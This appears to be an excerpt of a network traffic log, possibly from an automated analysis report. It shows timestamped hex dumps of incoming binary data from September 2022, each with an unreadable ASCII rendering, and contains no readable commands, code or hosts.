                                                                                                                                                            2022-09-29 12:45:07 UTC15592INData Raw: f4 56 8a 1a 6d 60 18 63 a1 ae 34 a3 b5 8f 79 b6 84 9c 4e 79 f3 03 a5 e0 f1 2c b0 fd 3d d5 e1 4d 52 b9 7c 16 03 5f dc 91 a3 9b 23 02 f9 e0 b6 cb 50 6e 43 06 45 6e 27 68 1f b1 60 9e 9f 94 03 19 d4 3d 18 b2 1f 1c cd cc 5a 38 3a 35 3e 74 b6 a9 9f 87 fa 30 36 2a 95 d3 0b db 7a e6 21 7d 9f ce d9 c3 73 0c 22 9e 47 b1 e6 9b d6 78 89 b4 4b 80 36 d1 57 34 76 cf ee ff 44 cd d8 ef 42 9e b1 77 8f 3d 42 5c 4c da 1b d4 42 b4 1a ee e1 e0 82 24 90 0a 0b 46 a7 31 f1 a2 de cb 75 60 00 0c d1 e8 72 9e fc 53 b1 93 0a 3a 3c 65 a1 1f 91 c8 ee 20 76 db 2c 8e f0 ba 95 fe 84 a3 dc e5 ab cf 58 ad 0f 01 b3 87 61 26 84 f3 93 20 5f fa 4a 00 27 36 0c d7 43 5a e5 b7 cd cf 42 6d 21 d6 09 37 28 ef e7 97 a1 ab 54 9c 03 81 f1 46 f9 e5 1b 2e b4 25 6a 80 21 2d 09 ad 10 1b ee ae 04 e2 42 16 ff
                                                                                                                                                            Data Ascii: Vm`c4yNy,=MR|_#PnCEn'h`=Z8:5>t06*z!}s"GxK6W4vDBw=B\LB$F1u`rS:<e v,Xa& _J'6CZBm!7(TF.%j!-B
                                                                                                                                                            2022-09-29 12:45:07 UTC15608INData Raw: 0e 39 d9 57 6a 37 40 10 66 bf 7f 57 3d 95 59 e4 ba c4 db ff 2e f2 6b e8 eb 4b 2a 86 61 30 37 91 70 b4 9b 16 a2 60 a5 89 35 5e a3 cd ee f3 e2 9f 69 90 d6 87 05 1c b7 f7 b9 05 58 fe f9 ae d6 67 6e 66 68 d0 cf 8f 96 8e 6a 0f 16 6e 45 27 76 e8 82 17 8e a1 12 d3 09 e4 56 74 74 af c8 65 12 95 fb a0 78 50 6c 98 2c 02 d8 b1 25 fc f6 e8 e0 3d 1d 2e 68 56 21 02 22 fb 9d 97 bc 53 30 43 6e 32 fd 8b b3 11 9c 79 f3 87 e4 9d fb 01 49 a9 2b 8b 84 09 8b ed e4 b8 61 5f 36 3a f0 b5 de 7a 62 58 cf 5f 0b c5 90 31 c5 57 be 60 a1 bf fd 1e 18 74 65 56 a7 d8 d4 b0 e7 08 3b 0e af 7f ae f3 69 e0 91 f6 fc ac c1 75 b1 f7 df 31 ca 74 39 7e e7 87 48 31 94 93 aa 22 c3 b2 55 e9 a4 68 f7 c4 82 30 6f f0 33 f9 c4 77 c8 46 d3 0b 68 20 d4 4b a3 33 42 42 5f 37 03 48 f1 c9 85 b2 d5 9b 79 45 f2
                                                                                                                                                            Data Ascii: 9Wj7@fW=Y.kK*a07p`5^iXgnfhjnE'vVttexPl,%=.hV!"S0Cn2yI+a_6:zbX_1W`teV;iu1t9~H1"Uh0o3wFh K3BB_7HyE
                                                                                                                                                            2022-09-29 12:45:07 UTC15624INData Raw: 95 8d 72 f7 9f 01 df 71 e9 b0 db a8 89 94 e4 46 72 35 c5 c1 04 04 6c 21 85 71 41 16 f3 6f 14 20 f3 9c e2 31 e1 94 88 f3 cb 04 ca ab b6 e5 fa dc 0a 06 5d 3f 53 ed f3 d9 5d 33 7c c5 d1 54 96 e3 a2 10 a8 e7 f8 80 60 de bf ec 95 18 9f 18 35 a5 6c 1e 4e ac 77 f3 6a 50 69 ad 09 17 8c 2a 56 46 f6 5f b4 e6 08 ac 1a e2 e0 91 cd 74 89 55 83 ab 26 46 05 a3 23 8c a7 f6 bf 44 8e 88 49 0c 13 0c a8 ee 8b fb 67 8d f8 73 88 22 ed 36 cd b4 90 28 57 56 e0 3e 4c 9a 6b ed e2 b4 c7 e5 dc c2 27 43 6e 51 4a c3 2b e2 62 32 34 92 14 b7 43 4a c4 34 96 a2 84 d8 5e fe 55 c3 e1 f3 59 ca c1 f8 5d f8 71 56 64 67 d9 96 fc 46 3c 8e 21 70 2c 44 a5 15 f8 ef dc 2d 99 00 b4 21 c5 06 08 f6 2a fd 0b 5f 2b 41 06 f9 9e 58 55 b9 cc 25 3f 2d 64 f1 09 16 48 04 7c b2 01 7b 11 c0 5e 9e 79 7d a5 5e 93
                                                                                                                                                            Data Ascii: rqFr5l!qAo 1]?S]3|T`5lNwjPi*VF_tU&F#DIgs"6(WV>Lk'CnQJ+b24CJ4^UY]qVdgF<!p,D-!*_+AXU%?-dH|{^y}^
                                                                                                                                                            2022-09-29 12:45:07 UTC15640INData Raw: 06 87 5b 8b 6d 58 f5 1e a6 20 a4 f4 19 52 c3 9a bd 64 c0 48 d5 b5 16 6c f7 36 fb c3 ae 4c 86 73 38 4c a8 e7 8c 8d a0 85 9a 4c e6 3e 0c fa 23 2c 18 d5 f6 9b 2e 0b c8 b4 3e f1 e9 e8 02 1c 7b a6 85 1e ba 14 06 00 e5 fe 2c 7f 00 25 ac d5 3c 4f 1e b6 c9 1f f1 9e ce ef f1 e8 d9 9d 34 b4 ff c5 c8 0a d4 fa 7c fa 29 29 02 9c 11 68 93 5b af 11 2b d6 36 7f c2 e7 bc 2a 32 51 a0 17 82 5b 22 27 0e a3 1e 4e b1 50 1e a8 94 61 9f 8b 55 bf 39 bf 50 70 35 c6 df ec 4a 76 72 6f 07 68 59 fe e8 34 ee 46 06 fc b5 26 76 73 5d 53 69 57 cb c6 8f 42 82 65 0c 23 e5 1f b6 8e 1a c0 37 50 30 63 ea 36 bf d5 fb f3 8f 7e b9 03 7f 96 c0 63 00 ea 64 45 88 62 bb ad d0 02 35 5e 39 b7 67 ae 89 58 9c 81 6a 37 eb d8 3c 8a e1 c2 26 c8 77 99 f3 a4 2a 8b bc 3c 93 31 92 96 80 87 99 45 c2 df 68 1c 4b
                                                                                                                                                            Data Ascii: [mX RdHl6Ls8LL>#,.>{,%<O4|))h[+6*2Q["'NPaU9Pp5JvrohY4F&vs]SiWBe#7P0c6~cdEb5^9gXj7<&w*<1EhK
                                                                                                                                                            2022-09-29 12:45:07 UTC15656INData Raw: 89 72 96 35 1d ba 7e 6f 4e e4 a8 e6 1a 24 7c 70 14 ec f8 76 c8 79 8e 08 f0 44 72 86 55 61 e0 83 42 d9 2a c0 16 c4 16 d0 76 76 ac b6 7c cf a6 da 42 c3 16 05 d9 5c cf 45 c4 ff 23 88 ce ad 46 64 50 8f e0 b3 c7 f0 67 a1 ca 46 ad ef 62 77 97 16 6f 51 61 28 8b 96 34 ec f2 19 df 91 3e 91 9e 69 c8 16 b0 9e 5a a3 21 8d 9a b6 0e 68 65 47 a6 32 2b a9 e0 30 57 84 24 4a 80 8b 85 f7 fb 14 3c bf 6f 67 6f 19 2f da 29 57 4f a3 1c e0 45 8f 0f 67 f8 74 f1 d8 f9 f6 fe eb 62 79 66 7a ea f7 0b 07 b8 cf 54 37 db 66 c3 01 70 40 b6 f9 c6 f1 9c 72 08 6a 5f 35 30 a1 4b 85 63 1b 48 5c 09 10 25 cf 02 1e f9 d3 82 fd b8 be 04 52 94 e9 e3 e6 cf f2 e9 19 64 11 af 56 f6 c0 5c 36 dc 41 9b fe b2 f4 cb 1c 47 05 61 d9 de 36 33 7a 70 00 71 1f bb 62 68 8c ea 15 dc 31 72 25 1f 08 14 50 54 80 2c
                                                                                                                                                            Data Ascii: r5~oN$|pvyDrUaB*vv|B\E#FdPgFbwoQa(4>iZ!heG2+0W$J<ogo/)WOEgtbyfzT7fp@rj_50KcH\%RdV\6AGa63zpqbh1r%PT,
                                                                                                                                                            2022-09-29 12:45:07 UTC15672INData Raw: 0c ef 85 ab 93 f0 d5 42 74 91 df cd af 73 b9 9e 63 ef 78 a7 77 49 02 6e 6f 8f c5 4f cf d4 36 d4 94 01 ff df 8d 3a 1e 7d cf 8f 86 9e 1a b2 66 17 12 4a f9 93 8b dc 6c f2 5c 97 92 54 21 2b 97 77 d9 bd f4 ea e7 87 7c c6 eb 14 99 d0 70 d5 32 62 44 d9 36 ef c1 20 ef 2c cc 06 b8 65 07 f2 85 5d 65 86 9e 20 6a b8 e1 d5 0a 22 1a 23 60 66 52 79 3e da bd bd e9 e0 64 c0 43 e8 73 1b 64 52 17 ac df b8 3d f1 77 da 07 f9 69 dc 5d 96 76 13 6c a4 e9 22 c8 7a 68 0a 88 a2 49 a4 9a 00 c0 35 36 d8 88 a2 86 ca a0 7c 3d 63 0c e0 da 6c 6e de f5 66 60 0d c7 b1 48 f2 3a eb 46 c9 00 6e f5 cf 5f 31 0a 2c 90 ac c9 6a d7 20 3b e6 be 09 44 e7 ec 1a 01 20 7b 9d 5e e1 5e 46 7b 3c a8 81 74 a7 39 ce 7b a2 49 0c 58 e2 b4 33 18 16 2d bb 92 b8 4f f9 5c 48 03 18 5b 2a 79 68 70 53 0b 9f e8 55 aa
                                                                                                                                                            Data Ascii: BtscxwInoO6:}fJl\T!+w|p2bD6 ,e]e j"#`fRy>dCsdR=wi]vl"zhI56|=clnf`H:Fn_1,j ;D {^^F{<t9{IX3-O\H[*yhpSU
                                                                                                                                                            2022-09-29 12:45:07 UTC15688INData Raw: fd d8 86 aa f2 13 81 78 7c f3 d2 6c 82 47 15 fb c6 de 3a f4 0b 61 47 cf 67 13 33 ed 41 96 c6 9b 6c ef 8a 6a 30 a9 93 1c e5 34 36 5a df 91 8f 42 02 59 f2 7b 7c ca c0 86 f6 54 21 ab 1c 4e 0d cd 02 90 9f af 5e 3f bb 7d 36 57 65 56 e3 24 b6 3e 58 3a f5 8f 5a 08 74 0d 29 30 38 52 14 ac 18 a6 fa 06 bf 14 8d 5b 15 04 cf c3 2b ca 43 31 99 92 ed ae 73 c9 59 67 ed 31 ac 87 e9 f5 f2 bf 4f eb 09 14 de c1 ce c8 a1 01 e3 95 31 f8 54 86 d0 0b b4 d4 88 78 b2 c9 cd e1 18 47 f4 3a 50 40 29 86 04 d8 26 d2 43 99 90 eb 7b 60 81 04 14 e6 5a 5d c2 bc e8 6f 5f df 73 35 e5 c3 7e 80 32 39 7d c8 1f 73 1a b5 e8 9e 8d 3d 0a 71 b1 14 ec cc 30 bf e3 55 01 87 58 91 07 c5 a1 44 6f 8b 99 39 1a 68 cd b7 5e 56 6c 04 40 ab 74 db 8c 6d cd 09 d8 13 8c 51 ec c9 0f 86 c1 e7 4a 80 19 92 45 30 08
                                                                                                                                                            Data Ascii: x|lG:aGg3Alj046ZBY{|T!N^?}6WeV$>X:Zt)08R[+C1sYg1O1TxG:P@)&C{`Z]o_s5~29}s=q0UXDo9h^Vl@tmQJE0
                                                                                                                                                            2022-09-29 12:45:07 UTC15704INData Raw: 22 ef b9 3f 83 7c 4c 88 5e 67 63 b6 dd ad 6c fb 5e d7 48 d6 72 66 72 5e d5 55 b6 57 c9 05 1e 42 ad c4 bf e4 0a fb 3e a6 a7 c2 9b e4 42 22 c1 e6 bc b4 69 9f ec b2 51 16 8a 13 12 7d 2d e9 10 e4 7b 0b 8d 2f 86 8d 10 69 c9 8d 85 a4 af 10 07 e3 ec ee ef 0a fd 3e 45 6d 4f 4c 4b 06 9e 3f f9 96 9e 57 c0 3e c6 c4 87 fe 16 a8 29 5b c8 12 9a 0a c9 48 3c 7d 65 f3 cd 66 cb 7f fc 29 07 72 a8 ec bd 50 50 8e 36 23 f6 c0 24 9c b0 27 88 f4 fa 3b fd c2 6a 17 68 85 f7 b8 13 5d 1c 5b f1 e1 ac 34 09 a2 f1 3c c5 f5 54 06 48 23 37 d6 06 cc 95 2c 03 f9 30 60 fb 5a c7 8c f8 db 37 97 fa 0a 9b 84 12 41 79 af e6 45 14 bb d7 38 f2 fd da 78 32 ab 1d e8 18 0e 64 a1 0c fc 72 b2 bf bc e0 5e 69 bf 60 aa 63 3f c1 4e 93 22 4a ed 5d cb 29 5b 53 f4 2c d9 54 cd 59 01 bc d0 82 33 ed d5 2c 4e cd
                                                                                                                                                            Data Ascii: "?|L^gcl^Hrfr^UWB>B"iQ}-{/i>EmOLK?W>)[H<}ef)rPP6#$';jh][4<TH#7,0`Z7AyE8x2dr^i`c?N"J])[S,TY3,N
                                                                                                                                                            2022-09-29 12:45:07 UTC15715INData Raw: 7d f6 58 f2 2f 04 f1 12 11 6b c3 20 bb 8f c3 19 da c2 b4 21 ee 97 d3 7b 5e f5 de a6 40 d6 43 a9 50 a1 1b 11 84 8d 09 25 16 c4 25 fa 95 bb b1 01 2c 86 30 ba a9 04 6a 31 81 c5 fc c3 3e 08 5c fe ad 33 4d a7 0f 4b 4e c6 24 10 30 3c 55 b6 32 e8 ab 72 4a db f5 49 15 2f 6d ef e9 ec 55 85 f1 da 21 37 04 d6 d0 14 19 0a ae 12 4b a2 f7 e9 88 23 09 40 22 4e 44 3c a3 54 e3 25 26 1c 95 e1 23 75 da 40 25 d0 19 f0 c9 89 1d 64 07 d4 9c 38 00 02 e5 df ae a5 11 a2 9b 67 29 ef 04 b0 5b a0 55 50 ec 4d fb 8b c6 aa de 62 23 be fb 84 bb c7 b7 e2 16 a8 d7 34 97 46 84 ce 87 20 5e 5f cb 0f 50 05 c0 69 a9 10 c4 fc ef 85 87 f1 58 4c 82 e6 25 75 55 b1 2b c4 16 6e dd 11 16 4b 8b d8 81 c5 18 15 e6 c9 c9 8e 55 04 a4 78 61 c0 62 78 85 18 aa 3e 0a d5 92 c2 17 44 18 e7 60 df 43 f6 4a cf 66
                                                                                                                                                            Data Ascii: }X/k !{^@CP%%,0j1>\3MKN$0<U2rJI/mU!7K#@"ND<T%&#u@%d8g)[UPMb#4F ^_PiXL%uU+nKUxabx>D`CJf
                                                                                                                                                            2022-09-29 12:45:07 UTC15731INData Raw: 14 7d 43 28 45 e2 e4 d3 03 af 14 0e 55 c9 a6 d9 e8 49 1e 65 5a 3b 00 49 5f 04 09 45 66 d3 2b 36 b3 da e2 06 34 17 f4 95 94 16 de 46 cf 20 8e fc 8f 29 ad ab ea ed a2 ae 95 0a fe d8 64 ed 9a dd 1d a1 ec d8 fd 50 49 54 e6 10 50 af e7 c2 c8 5e d7 33 88 ea 4d 53 24 cc 59 6d 39 1d 18 ed 49 5d fc 0e 85 3e af cd c5 e7 0b e8 f1 13 fb a0 ef 14 d3 a7 eb 7c 39 e8 f0 17 93 16 db 2e 44 44 9d 40 f0 7d d9 1b 04 9b a1 8c 36 cb 9b 70 3a f2 8c 5a de a0 da 31 e2 c2 48 ea 25 ab 3e a3 b8 38 28 82 44 3f 15 27 2e 9e 44 a7 3c 7b 93 de c6 b5 f6 06 f1 86 db d3 41 5a d6 33 81 cf 72 98 6f 21 07 1c f6 c2 c1 b5 11 58 d1 7b 26 b9 d6 19 11 9d 14 6e ea 89 b5 be 6e cc 26 09 77 ac ec 51 b1 eb 81 e9 f8 23 ba e5 29 e4 14 4e 1e 29 8a aa 17 55 80 bf 85 eb b1 f5 51 98 b7 8e cb 68 09 54 04 80 3d
                                                                                                                                                            Data Ascii: }C(EUIeZ;I_Ef+64F )dPITP^3MS$Ym9I]>|9.DD@}6p:Z1H%>8(D?'.D<{AZ3ro!X{&nn&wQ#)N)UQhT=
                                                                                                                                                            2022-09-29 12:45:07 UTC15747INData Raw: 09 dd 37 b2 4d 07 8d 3d 95 b2 ed 72 b6 c2 58 88 10 d4 b9 62 06 94 54 e1 ac 82 78 82 84 5c bc 1f 9a a7 e8 0f aa b3 99 47 69 3a b5 19 89 2a 7c 6d 12 0d 95 ce eb 39 43 dc 84 db e1 15 d1 31 0a 58 b6 bf d9 7a b1 bb da 0d 04 61 09 e2 42 8d ef 39 b6 1f 86 6a 0c 43 ad d7 ac 8e 6c 02 5d 03 39 f3 82 c3 25 e3 3b e6 5f 9f 9a 63 ba f4 41 39 de ea 9c e7 ab e4 8f c0 ff 86 f9 92 50 a7 41 57 ea 17 d7 e9 6f 67 0e c1 1a 6e 4c 1a f7 14 d7 01 4e 19 c2 ea b6 61 d1 f3 4a 70 79 e4 2c e6 ac c3 4c 4a 7e 6e 8b e4 1d bd e8 33 e5 97 2d 84 76 d2 17 82 e3 9b c9 d6 69 03 c7 74 04 6e 26 c1 cf 55 f7 51 d7 82 20 d5 0a 17 84 e7 04 9f 5f a4 0f 32 eb 8d 55 53 48 6a ab 78 77 bc b8 f9 80 57 04 8f 39 36 97 c7 0a 28 47 6f b3 ce 82 b3 f5 38 dd f2 23 e7 66 26 ab fe 2a 34 35 28 34 07 41 b8 9d b2 be
                                                                                                                                                            Data Ascii: 7M=rXbTx\Gi:*|m9C1XzaB9jCl]9%;_cA9PAWognLNaJpy,LJ~n3-vitn&UQ _2USHjxwW96(Go8#f&*45(4A
                                                                                                                                                            2022-09-29 12:45:07 UTC15763INData Raw: 54 8c 63 2a 08 cb b6 73 6d ed 31 c3 0b d2 fb dd 97 d5 32 ce 20 58 e6 e9 25 f1 79 d2 f6 c1 6a f5 17 30 bb 5e 27 82 94 e8 e7 ce 7e 82 66 01 fa 5e 88 5c ee 10 b6 50 1e 48 7e 5d 17 28 9d c8 19 ee 6f ff 37 36 83 d9 bd 30 77 1d cf 6a bd 55 59 0d 8d d7 e0 3a 81 6e 46 73 88 5e b6 aa 7f 13 fe a4 9e 98 cb 6a 3c 3d 9c 08 43 c9 f7 66 a7 fe 00 07 39 5d 09 ae 74 a3 3a 80 bd c1 16 1e c5 26 e4 54 72 0b e7 8d 0a 12 4d 08 04 c4 9a dc 82 5a b2 f1 63 bb be f8 c6 86 e1 61 a8 be 2a 62 be 2c 6b 41 3f 05 2d c6 d5 51 cf fd 9c 21 02 6a da 34 dd 2f 91 33 ba ad 94 eb 80 af c5 6f ef ea e2 40 83 e5 88 13 4f c4 65 c2 24 be 71 a2 f9 fd 7d 08 77 e5 b2 e4 ea 41 ff 0f 68 46 45 ab e1 2c 72 21 09 50 ea cc 9d d1 5c a7 00 4f 74 fe 7c f0 6a ee b0 61 e2 6b 7c 84 dd 15 07 7f d1 10 56 f3 e3 98 d0
                                                                                                                                                            Data Ascii: Tc*sm12 X%yj0^'~f^\PH~](o760wjUY:nFs^j<=Cf9]t:&TrMZca*b,kA?-Q!j4/3o@Oe$q}wAhFE,r!P\Ot|jak|V
                                                                                                                                                            2022-09-29 12:45:07 UTC15779INData Raw: f1 a7 3d bc 0f bb e6 c1 cf 4d 03 bd 65 2d 73 d0 a1 ec 9c 03 36 e2 a1 b3 74 23 e5 fd 17 c8 4f ac 57 d5 01 d2 41 bc c7 e9 69 fe b1 23 b9 d3 ce f8 dd 84 cd eb 34 3a e7 20 99 70 e6 09 a5 ba d7 89 d2 ff 36 31 fc 53 08 44 7f 0d 42 ef 15 ad 52 7e d4 38 c2 7d d9 01 00 fd ae d7 f4 b7 bc 00 b1 30 2e 31 14 83 e0 09 4b 95 95 54 67 fe 3b 01 74 f9 ba 43 0b 5c 8e da 4b fc 70 30 0f 8a d9 a4 3f 81 c6 c2 c9 a1 01 46 81 30 1d 68 67 45 e6 5b a7 5c 53 b5 8e 12 35 95 aa 9c 7a 57 61 e7 2d fa 12 06 9c 0f 3a 27 01 45 84 9a 72 9a 4c 8a f4 e5 51 a7 20 26 45 f0 63 a3 76 ac d6 ca 62 b5 35 44 35 5c bd 0a e8 dc 95 11 2e b4 67 72 20 10 40 f9 d7 9a a9 9a e7 0b 0a 70 f4 e6 d4 04 1c de 2c 10 fe 4b 17 da 8a fb 7f 4a a4 36 d4 d0 23 c0 bc 56 21 ed b8 d9 7f 9d 5a 58 bf 27 4b 24 05 8a 45 3e c1
                                                                                                                                                            Data Ascii: =Me-s6t#OWAi#4: p61SDBR~8}0.1KTg;tC\Kp0?F0hgE[\S5zWa-:'ErLQ &Ecvb5D5\.gr @p,KJ6#V!ZX'K$E>
                                                                                                                                                            2022-09-29 12:45:07 UTC15795INData Raw: da 9e 77 43 10 94 eb 3f 01 be 2a 99 4f 1f 3e c1 1c 32 8b 81 17 3f 54 e5 b6 51 a4 b7 95 42 00 60 47 ba 61 6f b0 39 81 a1 a3 78 c8 8e ab 94 64 62 ce f6 f2 de b2 85 2f 96 b4 06 11 5f 10 bd 34 8f ca b9 44 28 06 c7 d1 f4 e9 2b 39 6a 4b 83 37 35 af 15 15 25 49 aa 88 f7 d3 76 72 7d f8 84 02 93 73 64 08 d2 bd c3 23 cc 51 f9 d7 86 47 24 c7 e0 0c 92 cc ef 27 73 c7 94 46 69 12 3c 25 ac c4 19 2b ed c2 bd 7f 0c 4e 2a 4d 60 71 33 40 2e f3 29 a4 e8 a2 7c 37 c0 44 23 26 c4 bb eb 77 d2 d2 58 ba 34 b2 d5 62 a1 59 cf 21 14 f8 b0 0f f3 83 4c 40 21 53 ae 03 30 31 8a f9 52 18 fc 65 3e 9f e0 30 53 c4 fa f0 ed f0 ca 70 71 e4 70 a9 a8 ca ab 21 5d 6d 4e 01 72 14 3e 21 74 b4 fd 95 af 5e fa 18 9f dc 01 74 a4 a7 cd 30 53 27 64 58 98 1e 76 47 74 43 4c b7 77 54 43 c1 93 00 b3 38 5c 33
                                                                                                                                                            Data Ascii: wC?*O>2?TQB`Gao9xdb/_4D(+9jK75%Ivr}sd#QG$'sFi<%+N*M`q3@.)|7D#&wX4bY!L@!S01Re>0Spqp!]mNr>!t^t0S'dXvGtCLwTC8\3
                                                                                                                                                            2022-09-29 12:45:07 UTC15811INData Raw: c1 25 2b d6 26 9f 2d b7 be 82 01 f3 c9 d8 60 e8 f9 de 46 60 ef 8b d0 c6 b2 9f f8 76 20 52 bf af f8 2a dd 62 f3 fa b3 9e 70 26 22 91 c3 1a 96 28 96 e9 85 0e 3b b7 de a8 0a cf 71 56 74 5a 9b e4 a3 d8 c1 0c be 84 b3 f4 32 3d 5c c9 8a 3e 56 6a 60 8c a5 a3 a4 83 fd 63 f0 64 d2 61 21 23 9c 66 a6 ff a7 ab 56 2c 6e 04 74 d8 3d 3c f8 c6 64 e6 c4 3f cc dc ab fd 9f 8e 23 1c 8e 8d f9 e5 f5 94 f7 62 fa 54 19 ec 3e 9a 05 f6 d4 94 14 87 0b 12 3c af b9 1a 22 e6 40 6e 25 60 df 98 af e5 fe 14 a0 76 1c 53 e9 09 21 3d 3f bf 3a 68 f1 3b 43 37 35 f5 f9 d7 39 44 a2 aa 88 5a ba b6 89 4e 69 4c b1 bb 67 44 b3 9b ed 1e 4b d0 d7 8a 8c 68 dc b3 b5 f0 8e 25 01 f1 78 0b 9b 2e 88 65 7a 81 d0 b2 82 81 cd c8 41 22 8c 55 e9 d4 9d 03 93 a1 c4 62 5b 0c bd dd ff b8 07 da 41 4e 4a dd da 6c 67
                                                                                                                                                            Data Ascii: %+&-`F`v R*bp&"(;qVtZ2=\>Vj`cda!#fV,nt=<d?#bT><"@n%`vS!=?:h;C759DZNiLgDKh%x.ezA"Ub[ANJlg
                                                                                                                                                            2022-09-29 12:45:07 UTC15827INData Raw: ba 70 f1 f5 1c a2 09 3f 42 ac b6 f7 01 bd de 1a 34 16 76 79 f6 f1 96 4f 2d 96 bb 6a ba ec fc 6c cf a3 ce b0 15 c9 e4 c5 00 65 76 6e 8e 54 ff 6b e6 5b 98 18 8e f4 89 c3 90 05 07 0c 88 a5 2b 48 64 c5 77 c6 c8 3a f8 f2 92 9f bd c5 71 21 16 b0 c9 85 7f 94 2b f1 54 7c 8c 90 6e 83 83 72 c1 5a 5e b8 ab 18 cb 81 a5 cc 3c f6 64 7e ef 4b 7f ed db be 96 d7 03 e9 83 d3 fd 82 83 fc 8d 5c 99 cc 92 4a db dd 92 49 25 58 45 5d ca 6a 0f 3d f2 f9 f4 be 18 95 79 30 99 84 8f b8 c2 95 8c 1a 24 54 d6 b1 4f 3c 7a 9b 07 d4 3e 18 96 75 15 36 c2 df 3d 6c 92 bf 12 2c 49 63 b2 e1 f8 f6 13 1a d2 4c ba ee 8f e2 70 25 a1 90 3e 6e 7b 98 60 87 e1 7f ec 55 02 6f 44 56 08 84 df 00 34 93 ec dd 48 17 e9 84 85 7d 02 69 d1 87 25 d0 de 33 38 e8 48 7d 74 80 48 d2 c2 48 75 37 62 7a a2 f8 ea 7d e1
                                                                                                                                                            Data Ascii: p?B4vyO-jlevnTk[+Hdw:q!+T|nrZ^<d~K\JI%XE]j=y0$TO<z>u6=l,IcLp%>n{`UoDV4H}i%38H}tHHu7bz}
                                                                                                                                                            2022-09-29 12:45:07 UTC15843INData Raw: a0 73 97 98 67 27 15 ad 67 6e 70 cd 50 0b 8b cb 84 c0 82 fe c2 ae fb 9a 88 c1 22 72 f9 43 f9 77 c3 c5 d5 45 59 fa 88 31 8a f5 03 83 98 4c 0a 0b 95 1c 9d 64 64 23 1e 18 3d e4 d6 5a cd 59 ed b0 10 8c f7 f5 00 8d 8a bf e4 55 c2 d6 b9 1a 23 3e b2 7f fe 3f bb 79 54 a9 81 ea 99 5a be d9 eb 1f bf 28 18 80 70 85 02 93 46 b8 40 9b 45 81 75 97 4c f0 da 8f 17 f2 4b f9 ca c4 b8 1c f3 ba b7 80 d4 b1 5a b2 90 0f f8 d4 8a 1a 58 60 ce bb ec ae 88 1e 06 e6 d5 71 07 84 ec 63 7c 41 12 d9 9f e8 5d 7b df a4 ad a7 ba 6d a0 f2 01 0c 98 b1 09 f5 13 1c ee cd ab 18 0b d9 15 88 3f b6 48 da 7e 75 e5 04 9b 44 37 14 a2 0f 30 4b d0 b4 ec b7 ef 3e 69 c2 ed 15 20 ed b6 b4 46 f7 5e 24 37 d0 98 61 79 f6 62 ab ec 70 43 ae a1 4b 8d 52 f7 97 34 b3 c7 a4 a4 82 2e a3 eb 5c 32 88 80 55 62 ce 67
                                                                                                                                                            Data Ascii: sg'gnpP"rCwEY1Ldd#=ZYU#>?yTZ(pF@EuLKZX`qc|A]{m?H~uD70K>i F^$7aybpCKR4.\2Ubg
                                                                                                                                                            2022-09-29 12:45:07 UTC15859INData Raw: 41 7d 54 97 e6 78 f1 14 53 40 19 22 9e b1 6c 43 9b 73 a2 fe 9b 07 8f fc 10 96 ab 21 d4 86 23 d3 58 50 36 a5 25 73 82 1d 7a d2 3a f2 ac 30 1b 90 44 1d 2d 7e b1 72 c0 dd 63 b3 e6 67 24 1c cd 6b 94 ec e0 28 80 09 15 10 c8 b5 d7 4a f7 ea fd 1d c3 0a a2 25 4f 01 b0 4d ca a8 e8 ba dd 93 9e a2 39 ef bb 4d aa f3 ab 14 c1 50 9f 9e 77 56 b0 b1 2a 5d 34 6a 92 5b fc f2 2e d8 eb c0 88 38 9a e8 e6 e4 97 ba 8c 59 22 df 8e 04 22 b8 6a 8c b5 74 1e fc 62 35 76 42 83 35 b1 6e db 16 a1 9b 4f 31 a3 eb 54 e1 5e a1 90 68 10 48 05 47 6b fe 3d 29 5c 7a e4 48 cd 67 19 5b 40 a3 f0 22 02 fe b1 aa 2c 34 64 fe cc 8c fc c0 45 85 d2 e3 30 52 17 8c a0 4b 1d 38 a1 7a 72 5d 9e cb d5 49 22 af 99 12 b7 41 3e ba 54 cc 10 4e 9c 3c a4 09 87 b0 34 2f 41 2f bd a5 41 2a de 6c 13 cc dd 72 19 fb 74
                                                                                                                                                            Data Ascii: A}TxS@"lCs!#XP6%sz:0D-~rcg$k(J%OM9MPwV*]4j[.8Y""jtb5vB5nO1T^hHGk=)\zHg[@",4dE0RK8zr]I"A>TN<4/A/A*lrt
                                                                                                                                                            2022-09-29 12:45:07 UTC15875INData Raw: eb b7 7b 3f 63 68 22 0b 2d 1a 28 32 b3 4d 12 72 ee f4 1d 95 11 79 26 e3 49 79 84 17 5b ff 9b 45 9d 98 26 fa 07 5d db b9 a1 79 48 53 04 b5 2b dd ed b6 d7 94 94 4a ad de be ec b3 3a 86 28 5c 39 98 2b a5 ba 67 45 77 70 e6 5f a6 6d 2e 86 c2 ee 8d 77 02 c0 9f 0f 4c 44 de 6e 09 7f f7 8a 93 b5 40 20 0d 2b bb 97 16 71 09 44 7e f0 65 4b be dd b7 f2 01 69 21 8c bd e9 40 87 5b 15 3a cd 5e f9 36 1b aa af 58 9f da e9 02 0c 76 c2 9a fc 49 9c 26 bf 31 fd 83 d5 4b 2b de 83 5e 55 c6 2c 52 2a 31 87 3a 8b 70 a0 fc 66 4f 52 75 2d 2d 37 a9 a4 de 4d 74 9f a1 69 47 4e 66 47 a4 7e 2e b3 02 12 ee 17 f9 c8 28 a2 26 71 f6 ce 9f e9 52 17 c8 0a ed 23 49 1c e1 79 a9 6e f4 36 1e 67 1f f2 b9 72 35 2c b8 3a 59 b3 da c2 c9 6b 0c d0 32 66 b6 a3 ed c7 7f 3e 9a ee 49 9e ed e8 1a 3e 7d 9f 3d
                                                                                                                                                            Data Ascii: {?ch"-(2Mry&Iy[E&]yHS+J:(\9+gEwp_m.wLDn@ +qD~eKi!@[:^6XvI&1K+^U,R*1:pfORu--7MtiGNfG~.(&qR#Iyn6gr5,:Yk2f>I>}=
